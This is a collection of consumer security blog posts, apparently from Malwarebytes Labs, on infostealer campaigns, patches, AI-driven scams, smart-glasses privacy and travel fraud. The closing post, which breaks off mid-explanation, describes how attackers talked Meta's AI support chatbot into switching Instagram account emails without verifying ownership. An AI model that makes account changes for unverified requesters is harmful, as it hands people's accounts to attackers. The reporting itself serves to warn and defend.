Malware Bytes Security

Build something that doesn’t exist. Don’t collect any data while you do it. Get it wrong and the CEO could face criminal charges. That’s close to the ultimatum the UK government handed Apple and Google on June 8. The two companies have three months to introduce device-level protections blocking nudity across every smartphone and tablet sold in the UK. If they don’t, the government will legislate—including fines and, as a last resort, criminal liability for tech bosses.

Prime Minister Keir Starmer announced the move at London Tech Week, telling the firms:

“If they choose not to, then we will act and change the law.”

The policy reads cleanly. The execution doesn’t.

What’s already on your child’s phone, and what isn’t

Both companies already do something to prevent children interacting with nudes. Apple’s Communication Safety feature warns children with a Child Account when they send or receive images and videos containing nudity across Messages, AirDrop, FaceTime, and other apps. It updated the feature with new functionality at its Worldwide Developer Conference (WWDC) this week.

Google’s Sensitive Content Warnings blur sensitive imagery in Google Messages for supervised users and signed-in unsupervised teens—though the feature covers images only, not video.

Apple will soon require people to confirm that they are over 18 in the UK and some other countries to access certain features on their phones. That will involve age assurance through government ID, payment information, or other verification methods depending on region.

These measures aren’t enough, according to the UK government. It complains that existing nudity detection isn’t applied to the camera or other apps, third-party messaging services, or search functions. So in other words, the protections miss most of the phone. The camera, WhatsApp, Signal, Safari, and the photo library all sit outside the protective bubble parents may assume already exists.

Is privacy-respecting scanning possible?

The announcement also contains a line that’s hard to reconcile with the rest of it:

“Companies must introduce these measures without threatening privacy or collecting any data.”

Adults can opt out, but only by completing age verification.

That’s a tall order. Privacy advocates argue that age verification inevitably creates new data collection risks, even when companies try to minimize the information they store. Whatever Apple and Google build, some form of record-keeping seems likely. If executives can face personal liability for non-compliance, someone has to be able to demonstrate what the system did and when.

The government’s proof that any of this is achievable rests on a single product: SafeToNet’s HarmBlock, which the Home Office calls “a proven example” of safe-by-default device protection. HarmBlock’s source code (which isn’t public) analyzes images and live streams entirely on-device.

Digital privacy groups were not happy with the announcement. Big Brother Watch pointed out that children could easily access adult-registered devices, and warned that mandatory ID checks for adults would mean “the death of anonymity and internet privacy.”

Private messaging app Signal said promises the scanning would run only on-device were “cold comfort” because wherever the system runs, its reach would ultimately be determined by government, not technology:

“Its scope will be defined by the whims and proscriptions of the government to detect nudity today and political speech tomorrow.”

Apple has been here before. In 2021, it announced a separate plan to detect known child sexual abuse imagery on devices by matching image hashes against a database of known material, and quietly shelved it after sustained backlash from privacy advocates.

What families can do today

September will end in voluntary compliance or hurried legislation. Either way, none of that changes what’s on your child’s phone right now. Today, the messaging channels most heavily used by teenagers aren’t protected. Many grooming and sextortion cases begin on apps that operate outside the operating system’s built-in safety features. Parents and kids can take extra steps for protection:

• Turn on Communication Safety on iPhones with a Child Account, and Sensitive Content Warnings on supervised Android Messages. They might only blunt the problem at one narrow point, but it’s better than nothing.
• Talk to your kids about coerced sharing. The Internet Watch Foundation reported that 91% of reports it assessed in 2024 contained self-generated content submitted by children themselves. Children are often coerced into sending explicit material to abusers online. The Internet Watch Foundation has a list of resources for people who are being coerced into sending intimate images online.
• Cover the basics that outlive any policy: put unique passwords on all accounts, and add multi-factor authentication.
• Be careful when sharing images of children you know online. Increasingly, criminals can use non-explicit images to create sexual content using AI that can in turn be used for extortion.

“One of the best cybersecurity suites on the planet.” 

According to CNET. Read their review →

Short-form video platforms like TikTok and Instagram Reels have become the latest way cybercriminals spread malware.

We’ve already seen attackers move away from traditional phishing emails and toward tactics that trick people into installing malware themselves. Now they’re being lured with slick social media videos that promise free Spotify Premium, free Windows activation, or free Microsoft Office, but instead leave people with infostealers on their Windows devices.

Researchers at ReversingLabs uncovered two active campaigns that use short videos to trick users into running dangerous PowerShell commands or visiting malicious download sites. Similar campaigns have been reported by other researchers and national cybersecurity agencies, suggesting a growing trend: Cybercriminals are learning how to use social media algorithms just as effectively as marketers.

In true social media fashion, the videos on platforms like TikTok and Instagram Reels claim to solve a problem you didn’t know you had. The catch is that following the instructions delivers malware to your device.

How the scam works

The first campaign looks deceptively professional.

Accounts with names like “windows.tips” or “windows.insights” use Windows-style branding and post polished tutorial videos that resemble genuine tech support content. The videos are tagged with Windows and Office-related keywords so they appear alongside legitimate troubleshooting and tips content.

The videos promise to unlock Spotify Premium, Microsoft Office, or Windows for free. Viewers are then guided through step-by-step instructions that include opening Powershell, a legitimate Windows admin tool, and pasting in commands. Those commands download and run malware, much like the ClickFix scams we’ve covered before.

The malware was identified as Vidar, an infostealer designed to steal sensitive informtion from infected devices. Vidar commonly targets:

• Saved browser passwords
• Autofill data
• Browser cookies
• Cryptocurrency wallets
• Two-factor authentication (2FA) data
• TOR browser data

The stolen information is then sent back to servers controlled by the attackers.

How to stay safe

Research into similar TikTok-based attacks shows these scripts commonly add exclusions to Windows Defender, making it harder for security software to detect future malicious activity.

Fortunately, there are  a few simple ways to protect yourself:  

• Only download software from official vendor websites.  
• Be skeptical of “free”, cracked, or unofficial versions of paid software. 
• Don’t follow instructions on a webpage without thinking them through, especially if the page asks you to run commands on your device or copy and paste code. Many ClickFix pages use countdowns, fake user counters, or other pressure tactics to make you act quickly.
• Check that downloaded files match what you expected to download.
• Verify a file’s publisher and digital signature before you run it. On Windows, you can usually check this by right-clicking the file, selecting Properties > Digital Signatures. Keep in mind that a valid signature does not guarantee a file is safe, but missing or suspicious signatures are often a red flag. 
• Use a real-time, up-to-date anti-malware solution to block malware like infostealers before it runs.

Pro tip: If you’re unsure whether a video, message, or website is legitimate, you can ask Malwarebytes Scam Guard about it. It can help identify suspicious content and advise you on what to do next.

Image courtesy of ReversingLabs

We don’t just report on threats—we remove them

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

This month’s Patch Tuesday remedies 206 Microsoft security vulnerabilities, which makes it the biggest ever.

The fixes include 32 vulnerabilities marked as critical by Microsoft, including three publicly disclosed zero-day vulnerabilities. Microsoft classifies these as zero-days because details were publicly disclosed before patches became available. None are known to have been actively exploited in the wild.

The sheer number of fixed CVEs (vulnerabilities) makes this the largest release since the Patch Tuesday program began. Microsoft formalized Patch Tuesday in October 2003, after the Blaster worm prompted a move to a regular monthly update cycle.

Technical details

One publicly disclosed vulnerability is important to mention. This flaw in Windows BitLocker is tracked as CVE-2026-50507 (CVSS score: 6.8 out of 10) and its description states:

“protection mechanism failure in Windows BitLocker allows an unauthorized attacker to bypass a security feature with a physical attack.”

BitLocker is a built-in Windows security feature that encrypts your entire hard drive, securing your data from unauthorized access if your device is lost or stolen. However, this vulnerability could allow an attacker with physical access to bypass BitLocker Device Encryption and gain access to encrypted data. As Microsoft notes, a successful attacker could bypass the BitLocker Device Encryption feature on the system storage device.

Another is CVE-2026-49160 (CVSS score: 7.5 out of 10) in HTTP.sys. This vulnerability can be exploited to launch a remote denial-of-service attack against major web servers using a technique called HTTP/2 Bomb.

The third to discuss is CVE-2026-45586 (CVSS score: 7.8 out of 10) in the Windows Collaborative Translation Framework (CTFMON). An attacker who successfully exploited this vulnerability could gain SYSTEM privileges. These elevation of privilege (EoP) vulnerabilities are especially valuable to attackers because they can be combined with other flaws to gain full control of a compromised system.

How to apply fixes and check if you’re protected

These updates fix security problems and keep your Windows PC protected. Here’s how to make sure you’re up to date:

1. Open Settings

• Click the Start button (the Windows logo at the bottom left of your screen).
• Click on Settings (it looks like a little gear).

2. Go to Windows Update

• In the Settings window, select Windows Update (usually at the bottom of the menu on the left).

3. Check for updates

• Click the button that says Check for updates.
• Windows will search for the latest Patch Tuesday updates.
• If you have selected to get the latest updates as soon as they’re available, you may see this under More options.
  In which case you may see a Restart required message. Restart your system and the update will complete.
  
• If not, continue with the steps below.

4. Download and install

• If updates are found, they’ll start downloading automatically. Once complete, you’ll see a button that says Install or Restart now.
• Click Install if needed and follow any prompts. Your computer will usually need a restart to finish the update. If it does, click Restart now.

5. Double-check you’re up to date

• After restarting, go back to Windows Update and check again. If it says You’re up to date, you’re all set!

We don’t just report on threats—we remove them

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

What would you trade for a technology that can do almost anything? For many people, the answer is clear: Everything they thought they could trust.

In a few, short years, Artificial Intelligence (AI) tools have granted people unfettered access to easier writing, faster image generation, quicker coding, and near-instantaneous answers, advice, and information—advantages they value and want. But the same tools that can spruce up a dating profile or reimagine an old photograph can also manipulate the broader world online, and people are noticing.

According to new research from Malwarebytes, 88% of people said it’s becoming harder to tell what content online is genuinely human or real, with 84% saying that “convincing video evidence” no longer feels like proof. Further, 85% said it can be hard to tell scams apart from the real thing—a major uptick from the 66% who said the same thing last year.

These are the first signs of AI’s counterfeit world. Replete with fake websites, fake products, fake videos, fake pictures, fake voices, and even fake people, it is threatening to swallow the web.

The latest report from Malwarebytes, “Face value: How AI is reshaping trust, identity, and scams” exposes the hidden cost of AI on the public: an excess of fraud that is dismantling trust in reality and in one another.

The damage arrives in large moments and small, from the US parent who said they “received a voicemail that sounded exactly like my son’s voice, saying he was in trouble and needed money for legal fees,” to the two entirely unrelated respondents fooled by the same AI-generated video of rabbits bouncing on a trampoline, to the individual worried about “my grandfather showing me AI slop and he thought it was real.”

For this research, Malwarebytes surveyed 1,500 adults aged 18 and older across the US, UK, Austria, Germany, and Switzerland about their uses, feelings, and concerns regarding AI. The sample was equally split for gender with a spread of ages, geographical regions, and race groups, and weighted to provide a balanced view.

The complete findings can be found in the full report:

Read the report

Here are some of the key takeaways and findings:

• 88% said it’s becoming harder to tell what content online is genuinely human or real
• 84% said convincing video evidence no longer feels like proof 
• 85% of people said it’s hard to tell a scam from the real thing (up from 66% last year)
• 50% have experienced some form of AI fraud or scam, such as being misled by AI-generated photos of products or receiving a highly personalized scam message
• 19% have specifically experienced some form of AI-driven identity harm, including the 10% who have had someone use AI to generate sexually explicit content of them without permission
• 81% fear someone stealing their family’s likeness, yet only 13% have created a family codeword to guard against it
• 67% worry about voice cloning, yet only 19% have turned off voicemail recordings to prevent it
• 45% say it’s okay to use AI for personal emotional tasks (like writing wedding vows or a eulogy)
• 34% say it’s okay to use AI to help create or improve a dating profile
• One in three self-avowed daily users of AI said it’s okay to generate explicit images of someone without their consent 

Defeat would be the wrong lesson to take from all this. It is true now that the internet requires assistance, but there are plenty of safe places to seek help.

While Malwarebytes works to provide new tools, we’d like to remind both the AI anxious and the eager about the first rule of the internet: Remember the human. People’s voices, bodies, choices, and agency belong to them and them alone. 

As for every fake video, product, website, and image, understand that there’s help. No one needs to navigate an artificial internet alone. Whether through scam detection, identity protection, and simple awareness, people have more options than they may realize.

Meta’s smart glasses are once again at the center of a privacy debate due to face recognition.

WIRED reports that Meta had quietly embedded unreleased face-recognition code, internally called “NameTag,” into its Meta AI companion app, which powers the company’s smart glasses. The code was not active, but its presence in an app installed on more than 50 million devices raised immediate concerns about how quickly using smart glasses could slide into biometric surveillance.

Face recognition in glasses, even if disabled or unreleased, is especially sensitive because it can identify people at a distance, in real time, and without their consent. Many organizations have warned that this technology could be misused by stalkers, abusers, and others who want to identify people in public without drawing attention.

Gizmodo reports on a proposed Pennsylvania bill that would require smart glasses and similar wearable recording devices to include a visible indicator light when they are capturing audio or video. The bill would also prohibit users from disabling that indicator, a move clearly aimed at reducing covert recording in public spaces.

Most smart glasses already include such an indicator, but reporters noted that some users have been paying others to have them removed or disabled. The proposal is interesting because it tries to solve a hardware-level trust problem with a visible signal. But a visible light only helps if it is both mandatory and difficult to bypass, and history suggests that any visible privacy safeguard becomes a target for tampering when the incentives are high enough.

These two stories are really about the same issue: smart glasses are normalizing the use of always-on cameras, microphones, and AI features in a form that is much easier to conceal than a phone. That creates an unwanted privacy problem for people around the wearer.

Smart glasses are supposed to make computing more seamless. Instead, they are becoming a test case for what happens when cameras, microphones, AI, and biometric features are squeezed into everyday wearables before the privacy rules catch up.

From our point of view, smart glasses sit at the intersection of consumer privacy, surveillance tech, and potential abuse. The risk is not just that a device records audio or video. AI-enabled wearables can process what they see, deduce identities, and potentially store biometric data in ways that ordinary users and bystanders can’t easily detect.

We’d rather err on the side of caution and use an app that can detect when smart glasses are nearby. Unfortunately, it only detects some devices, and we don’t yet know how well it will perform if smart glasses become more common.

As noted by 404 Media, the app is an imperfect, tech-based response to a social and legal problem: it can misfire, it can’t tell you who is being recorded, and it risks giving a false sense of safety. The developer frames it not as a solution but as a small, user-controlled countermeasure in an environment where surveillance devices are becoming less visible and more AI-enabled.

Don’t get recognized

If facial recognition features ever become common in smart glasses, much of their effectiveness will depend on how much information about you is already available online. There are a few steps you can take today to reduce your visibility in facial recognition systems and people-search databases.

A major factor is limiting who can see the photographs you post on social media and other online platforms. But there is more you can do:

Remove yourself from reverse face search engines

The major, most accurate reverse face search engines, Pimeyes and Facecheck.id, offer opt-out and removal processes that can help reduce your visibility in search results:

• How to remove your images from Pimeyes search results
• How to delete your photos from FaceCheck.ID search engine

Remove yourself from people search engines

Most people don’t realize how much information can be found from a name alone. People-search sites often aggregate home addresses, phone numbers, ages, and relatives from public records and commercial databases.

The New York Times has compiled a useful guide to many of the major people-search sites, along with instructions for opting out and removing your information.

Scrub your data

If you’re in the US, you can also use Malwarebytes Personal Data Remover to help find and remove personal information that data broker sites have collected about you.

Scammers go phishing wherever the victims are. In the UK, that means Facebook, Instagram, and WhatsApp, according to Lloyds Bank. It just revealed that Meta platforms account for over two thirds of fraud reports made by its customers.

Writing in The Sunday Times, Lloyds Bank’s fraud prevention director Liz Ziegler said that 68% of fraud reports from its customers start on a Meta-owned platform.

The scams cover everything from fake concert tickets and sporting events to bogus listings for cars, bikes, campervans, mobility vehicles, and rental properties. Lloyds said customers reported losing an estimated £66 million a year after falling victim to scam ads on Meta platforms, up from £27 million in 2023.

The victim demographic isn’t who you’d guess. Lloyds says customers in their late twenties and early thirties—supposed digital natives—are reporting scams at the highest rates.

Lloyds isn’t alone in calling out the tech giant. In 2023, TSB reported that 80% of losses across its three biggest fraud categories began on Meta platforms.

Meta says it’s doing plenty

A Meta spokesperson told The Sunday Times the company:

“…removed over 159 million scam ads last year alone, 92% of which we took down before anyone reported them”.

In October 2024, Meta also launched the Fraud Intelligence Reciprocal Exchange to let UK banks share intelligence directly with the platform.

However, a Reuters investigation published in November 2025 reported that internal Meta documents estimated that roughly 10% of the company’s 2024 advertising revenue came from scam ads and ads for banned, illicit or low-quality goods and services. The documents also estimated that users were shown around 15 billion “higher risk” scam ads each day.

In March this year, Meta rolled out additional anti-scam tools across WhatsApp, Facebook, and Messenger.

The lawyers are circling

UK firms Richardson Hartley Law and Humphries Kerstetter are coordinating a group legal claim for victims who lost money after clicking ads on Facebook or Instagram.

Scammers’ use of Meta AI has also introduced a new dimension to legal arguments against the company. In the US, a federal judge in California refused to dismiss key claims in Bouck v. Meta and Forrest v. Meta, lawsuits brought by fraud victims who allege that scammers used Meta’s advertising and AI tools to create and optimize fraudulent ads. The plaintiffs argued that made the platform “a genuine co-conspirator in the creation of the offending content.” Meta denies wrongdoing, and the cases are ongoing.

Last month, Santa Clara County filed its own suit against Meta, citing leaked internal documents that allegedly show the company earned as much as $7 billion a year from so-called “high-risk” scam ads. The county also alleges that Meta built guardrails to prevent anti-scam measures from reducing advertising revenue too much.

Protect yourself

Even if social media companies do try their best to quash scam advertisers, they won’t catch them all. So it’s up to you to keep a watchful eye for potential fraudulent activity. Here are some tips:

• Treat unsolicited social media ads—especially ones promising hard-to-find tickets, eye-watering investment returns, or impossibly cheap goods—as a default-untrustworthy starting point.
• Research the sellers. What else do they sell on the platform? Do they have an established profile?
• Pay with a card or service that offers chargeback protection.
• Never pay by bank transfer, cryptocurrency, gift card, or Friends and Family payment methods when buying from someone you don’t know.
• Be especially wary when a Facebook or Instagram exchange tries to migrate to WhatsApp. That handoff to a private channel is a classic scammer move, taking the conversation away from public scrutiny and platform enforcement.
• Remember that seeing an ad on a major platform isn’t an endorsement. Scammers routinely pay to place ads alongside legitimate businesses.

Something feel off? Check it before you click.  

Malwarebytes Scam Guard helps you analyze suspicious links, texts, and screenshots instantly.  

Available with Malwarebytes Premium Security for all your devices, and in the Malwarebytes app for iOS and Android.  

Try it free → 

Google has issued updates for the Chrome browser, patching a number of high‑severity vulnerabilities. 

The update includes fixes for 74 vulnerabilities, including one that is being actively exploited in the wild.

The stable channel has been updated to 149.0.7827.102/.103 for Windows/Mac, and 149.0.7827.102 for Linux, which will roll out over the coming weeks.

How to update Chrome

If you don’t want to wait for the rollout to reach you, manually updating is easy.

The easiest option is to allow Chrome to update automatically. But you can end up lagging behind on updates if you never close your browser or if something goes wrong, such as an extension preventing the update.

To update manually, click the More menu (three dots), then go to Settings > About Chrome. If an update is available, Chrome will start downloading it automatically. Restart Chrome to complete the update, and you’ll be protected against these vulnerabilities.

Chrome 149.0.7827.102/103 is up to date on Windows and Mac

You can also find step-by-step instructions in our guide to how to update Chrome on every operating system.

Technical details

The vulnerability that Google says is being exploited in the wild is tracked as CVE-2026-11645.

Google describes it as:

“Out of bounds read and write in V8 in Google Chrome prior to 149.0.7827.103 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page.”

This means this flaw was found in Chrome’s V8 engine—the part of Chrome (and other Chromium-based browsers) that runs JavaScript.

Such a flaw allows a program to read or write outside the memory boundaries it is supposed to use, enabling attackers to manipulate other areas of memory allocated to more critical functions. Attackers may be able to place malicious code in memory and trick the system into running it.

In this case, the vulnerability could be triggered when V8 processes specially crafted HTML content, such as a malicious website.

The phrase “inside a sandbox” means the malicious code would run in a restricted, sealed-off environment rather than directly on your whole computer. An attacker’s code is constrained to the browser, which lowers the impact compared with code running outside the sandbox. However, attackers often chain multiple vulnerabilities together to achieve more serious compromises. So, the phrase is a security limiter, not a reassurance that the bug is harmless.

The update also includes some new features, like the ability to sign PDF forms without using an extension.

Stop threats before they can do any harm.

Malwarebytes Browser Guard blocks phishing pages and malicious sites automatically. Free, one click to install. Add it to your browser →

The 2025 Federal Bureau of Investigation (FBI) Internet Crime Report shows that Americans reported $893,346,472 in AI‑related scam losses.

Those losses stem from 22,364 AI-related complaints. And these figures represent only the reported losses, which may well be the proverbial tip of the iceberg.

The main drivers behind the rise in AI-powered scams are voice cloning, deepfake images and videos, and AI‑generated scripts. These tools have supercharged classic fraud schemes such as romance scams, kidnapping and extortion calls, fake influencers, and government impersonation.

Michael Machtinger, deputy assistant director of the FBI Cyber Division, told the Wall Street Journal:

“AI-created fraudulent communications can look very official and very legitimate to even the most trained individuals.”

The FBI and financial institutions recommend verifying identities via official contact channels. One of their biggest concerns is government impersonation scams, which have evolved from crude IRS gift‑card phone calls into sophisticated, multi‑channel operations that combine spoofed caller ID, stolen agency logos, and AI‑generated audio and video of public officials.

This report, and others like it, shows how AI is being weaponized to automate research on victims, generate convincing scripts, and create highly believable deepfake personas at scale.

AI is also increasingly used in business email compromise (BEC), romance scams, and impersonation fraud. In BEC cases involving AI, losses have already reached tens of millions of dollars for businesses alone.

For a broader look at why AI is simultaneously fueling scams like these and becoming indispensable to defending against them, see my article AI: Threat, tool, or both?

It explains how both defenders and criminals use AI to find vulnerabilities, and why security vendors increasingly rely on AI to process vast amounts of telemetry, detect anomalies, and keep pace with threats that “no longer move at human speed.”

How to stay safe

Consumer protection agencies have documented a growing list of the ways scammers are using AI to try to rip people off. The main problem is that we can no longer take it at face value that the person we’re talking to is who they claim to be.

Government agencies and financial institutions recommend that you:

• Be skeptical of urgent payment demands, especially those involving cryptocurrency or gift cards
• Limit the amount of voice and video content you share publicly, as it can be reused by scammers
• Report incidents quickly to your bank(s) and IC3.gov

Pro tip: Malwarebytes Scam Guard can help you determine whether a message is a scam and guide you through the next steps.

Something feel off? Check it before you click.  

Malwarebytes Scam Guard helps you analyze suspicious links, texts, and screenshots instantly.  

Available with Malwarebytes Premium Security for all your devices, and in the Malwarebytes app for iOS and Android.  

Try it free → 

A new Windows malware campaign hides inside pirated PC games and modified installers for franchises like Far Cry, Need for Speed, FIFA, and Assassin’s Creed.

Researchers estimate that more than 400,000 devices worldwide have been infected, with around 30,000 users in the US.

The infection method is simple and effective. Users are lured into installing a fully functional free game. While the cracked and repacked game appears to work, the malware installs silently in the background.

The strain is being called “RenEngine loader” and sometimes referred to as Ren’Py because parts of the malicious code are embedded in a legitimate Ren’Py launcher used to run some visual novel games. When the launcher runs, it decompresses the game files and secretly starts the infection chain.

Ren’Py is a legitimate, open-source visual novel engine used by developers to make story-driven games with text, images, sound, and interactive choices. The malware in this case is not Ren’Py itself. Attackers are abusing the engine or its launcher as a delivery method to hide malicious code inside pirated game installs.

In practice, the primary infection vector is software piracy. Victims download cracked games or repacked installers from unofficial sites, then run what looks like a normal game launcher or setup file. In reality, they’re infecting their computer with a malware loader.

At the time of writing, this loader is trying to deliver an infostealer called ARC, which can grab saved browser passwords, cookies, cryptocurrency wallets, autofill data, system details, and clipboard contents.

But we’ve also seen other payloads being dropped, including Rhadamanthys stealer, Async Remote Access Trojan (RAT), and Backdoor.XWorm, which can expand the damage from credential theft to full remote control of the machine. That can mean account takeovers, financial fraud, crypto theft, and deeper compromise of personal or work data.

Worst of all, a user may not realize they are infected until usernames and passwords have been stolen or the machine starts behaving strangely. 

How to stay safe

The most important lesson here is that “free” cracked software is often a delivery mechanism for malware, not a bargain. Once a loader like this is on the machine, the real goal is usually to steal credentials or install a secondary payload that is more persistent and more damaging.

Some other general advice to stay safe:

• Don’t download installers from unofficial sources.
• Use real-time, up-to-date anti-malware protection to block loaders.
• Keep your software up to date, especially Microsoft patches and other security-related programs.

If you think your computer is infected and want to make sure, follow the instructions posted here. The amazing volunteers on our forums will help you through the process of cleaning your machine.

We don’t just report on threats—we remove them

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

Last week on Malwarebytes Labs:

• Your phone called. It needs a cleanup.
• Fake BlueWallet steals passwords, accounts, and crypto from Macs
• Fake virus alerts are invading mobile games
• 23andMe exposed genetic information of millions, lawsuit says
• These convincing copyright notices are designed to steal Google logins
• Infostealers are becoming the go-to phishing payload
• Keep getting calls from questionable numbers? Meet Scam Number Check
• We found this fake-invoice campaign while scammers were still building it
• Meta’s AI support bot happily handed Instagram accounts to hackers
• Travel scams are everywhere. Here’s how to avoid them
• AI: Threat, tool, or both?

Stay safe!

Let’s face it, an incognito window can only do so much. 
 
Breaches, dark web trading, credit fraud. Malwarebytes Identity Theft Protection monitors for all of it, alerts you fast, and comes with identity theft insurance. 

Public attitudes toward Artificial Intelligence (AI) are changing, and we wanted to understand why.

A recent Pew Research survey found that about half of adults say the increased use of AI in daily life makes them more concerned than excited, and that concern has grown over the last few years. People tend to worry most about long‑term social effects (jobs, creativity, relationships, misinformation), even while many do use AI tools and see some practical benefits, particularly for data analysis and routine tasks.

Data from an older UK survey already showed something similar. Awareness of highly visible AI technologies, such as driverless cars and facial recognition is high, but awareness of AI in welfare assessments, loan decisions, or care services is much lower. Concern about many of these use cases has risen since 2022. In other words, people feel AI is everywhere, but don’t always understand where or how it’s being used, and that makes people cautious.

The concern is usually less about science‑fiction extinction scenarios and more about social and economic harm. People worry about their jobs disappearing, a loss of creativity, the spread of disinformation, and increased surveillance, more than about killer robot scenarios.

Research into public attitudes towards AI repeatedly finds that people hold conflicting views, shaped by narratives of admiration and hype on one side and threat and dystopia on the other.

They see genuine benefits in the technology, but are increasingly wary of how companies, governments, and criminals might use it. Basically, people aren’t scared of AI itself, but about who’s using it and for what purpose.

Cybersecurity

AI in cybersecurity is a special case. When asked in which field of AI research they would invest an unlimited amount of money, people chose the fields of medicine and cybersecurity.

People increasingly recognize that AI is now a tool used by both defenders and cybercriminals. Few would feel comfortable with defenders refusing to use AI while attackers continue to adopt it.

Security products use machine learning to process huge volumes of data, detect unusual behavior, prioritize alerts, and identify threats faster than human analysts could alone.

At the same time, cybercriminals are using AI to create more convincing phishing emails, clone voices, generate fake images and videos, automate research on victims, and develop malware that can evade traditional detection techniques.

Both sides use AI-assisted tools to find software vulnerabilities that could be exploited to defraud people or breach systems, so vendors want to patch them before cybercriminals exploit them.

While studies consistently show that cybersecurity is one of the AI applications people worry about most, they also see that AI is increasingly necessary to keep pace with modern threats. A 2025 study focusing on AI in cybersecurity found that the public widely recognizes the technical benefits of AI‑driven defenses (speed, scale, accuracy), while remaining concerned about privacy, bias, and job displacement in security operations.

That is why the AI debate in cybersecurity feels different from the debate in many other fields. People may be uneasy about AI, but they also understand that the threat landscape no longer moves at human speed. Attackers already use automation, scale, and increasingly AI‑assisted workflows, so defensive teams that refuse to adapt would simply be slower and less effective.

Our mission at Malwarebytes is twofold: reduce the risks created by AI, and use AI to prevent, detect, and respond to threats. We’ve been using machine learning in our security products for nearly two decades, developing proprietary detection systems that help identify malicious code and suspicious behavior at a scale and speed that would be impossible manually.

Coming soon: How AI is changing trust online

Malwarebytes recently surveyed 1,500 adults across the US, UK, Austria, Germany, and Switzerland about their experiences with AI. The findings reveal a growing uncertainty about what people can trust online, alongside increasing concern about scams, impersonation, and AI-generated deception.

Stay tuned for the full Malwarebytes report on how AI is reshaping trust, identity, and scams.

Use AI safely

If you use AI in a security context, keep your data hygiene strict. Don’t paste passwords, customer data, or sensitive incident details into public AI tools. Treat AI-generated outputs as untrusted until verified, especially when they touch code, logs, indicators, or policy decisions.

AI can be useful for summarizing information, indentifying patterns, and producing first drafts, but keep a human in the loop for anything that affects access, containment, legal decisions, or public communications. Where possible, prefer enterprise or local deployments with logging, access control, and clear data-retention rules.

Also remember that AI can hallucinate confidently. In security work, that means every output needs validation against logs, documentation, source code, or other primary evidence before you act on it.

Something feel off? Check it before you click.  

Malwarebytes Scam Guard helps you analyze suspicious links, texts, and screenshots instantly.  

Available with Malwarebytes Premium Security for all your devices, and in the Malwarebytes app for iOS and Android.  

Try it free → 

Planning a holiday should be exciting, fun, and not a cybersecurity risk. But booking flights, hotels, and rental properties often means sharing sensitive personal and financial information across multiple platforms. Combined with frequent travel scams and recurring data breaches in the travel and hospitality sector, it creates plenty of opportunities for criminals.

This guide covers the most common risks when making travel reservations and explains how to avoid them. Save the adventure for your destination.

Travel bookings combine high-value payments with urgency and emotional decision-making. Attackers love that for several reasons:

• Large upfront payments make scams profitable.
• Booking confirmations often contain valuable personal data, such as names, travel dates, contact details, and sometimes passport information.
• Travelers are more likely to act quickly and overlook red flags.
• Travel and hospitality companies are frequent breach targets due to complex IT environments and third-party integrations.

Recent years have seen repeated breaches involving hotel chains, booking platforms, cruise operators, and airlines, exposing everything from email addresses to passport numbers.

Common travel-related scams Fake booking websites

Attackers create convincing clones of airline, hotel, and travel booking websites, often promoted through online ads or SEO poisoning (manipulating search engine results). Victims enter payment details, receive fake confirmations, and only discover the fraud later.

Last year we uncovered a campaign using fake Booking.com websites that tricked visitors into infecting their own devices with a Remote Access Trojan (RAT).

Phishing messages about reservation problems

Emails, texts, or messaging app notifications may claim there’s a problem with your booking and urge you to click a link, open an attachment, or call a number. The scammers often impersonate legitimate travel brands and may include real stolen data from previous breaches.

Earlier this year, we wrote about a Booking.com breach that provided scammers with a lot of useful information that could make their messages appear more convincing.

Vacation rental fraud

Scammers post fake listings or hijack legitimate ones on rental platforms. They typically encourage off-platform communication or payments to avoid built-in protections.

In 2024, one of our researchers encountered exactly this type of scam. A supposedly legitimate Airbnb listing in Amsterdam turned out to be fake, and the scammer sent an email claiming to be from TripAdvisor in an attempt to collect payment details.

“Too good to be true” deals

Deep discounts on flights or accommodation are used to lure victims into paying for offers that don’t exist.

If a deal seems unusually generous, look for the catch. Be especially cautious when advertisers claim the offer will end very soon. Creating urgency is one of the oldest tricks in the scammer playbook.

Scam or legit? Scam Guard knows.

TRY IT NOW

Booking.com impersonation scams

Booking.com has become an increasingly popular brand for scammers to impersonate. According to our—anonymized—Scam Guard data, we’ve recently seen:

• Fake cashback emails promising a €435 refund that lead to phishing websites
• In-app messages requesting an additional reservation fee
• Emails containing PDF attachments that require a “secure viewer,” which turns out to be malware
• WhatsApp messages claiming credit card details are missing and directing users to phishing sites
• Text messages linking to fake Booking.com pages and demanding card verification before a deadline

The number of scams impersonating Booking.com has been growing. Since the breach disclosed in April, Scam Guard data shows a 56% increase in Booking.com-related scams compared to the previous period, with weekly volume up consistently across five straight weeks.

How to book travel safely

There are a few simple things that can dramatically reduce your risk:

• Use secure payment methods. Credit cards offer better fraud protection than debit cards or bank transfers. Never pay anyone asking for payment in cryptocurrencies or gift cards.
• Stick to trusted platforms. Even though these are not guaranteed to be safe, using them is better than gambling on an unknown platform.
• Don’t click on sponsored search results. I cannot say this often enough.
• Verify the existence of the booked accommodation through other channels.
• Treat requests to move communication or payment to another platform as suspicious.
• Consider urgent language, unexpected attachments, and mismatched sender domains as red flags.
• Downloads needed to open an attachment are not to be trusted. These downloads often turn out to be malware. To block and remove malware, use an up-to-date, real-time anti-malware solution.

Pro tip: Malwarebytes Browser Guard will block known phishing websites and can even recognize suspicious websites that are not in our database yet.

We don’t just report on threats—we remove them

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

Customer service chatbots have one job: get the user what they’re asking for without bothering a human. Meta’s new AI support assistant took that brief a little too seriously. Over the past few months, attackers have been opening support chats, telling the bot they were locked out of Instagram accounts they didn’t own, and walking away with the keys.

Over the weekend, Meta pushed an emergency patch after Instagram accounts belonging to the Obama White House (now dormant), beauty retailer Sephora, and a senior US Space Force official were taken over and briefly defaced with pro-Iranian imagery. Security researcher and former Meta employee Jane Manchun Wong was also hit.

How the trick worked

The attack was simple. Attackers worked out where the account owner lived (there are lists of account owners’ home cities online, or they could just research the target). Then they used a VPN to match the target account’s geographic region, which avoided raising flags with Instagram’s security systems.

Then they started a normal password reset and opened the support chat. They asked the AI bot providing support to change the email address on the account, and it did exactly that, sending a one-time code straight to the attacker’s inbox.

To do this, the chatbot appears to have been wired into Meta’s account management systems with permission to make account changes, but without being taught how to verify it was talking to the real account owner. Security people have a name for that: “confused deputy.” The term has been around since the 1980s.

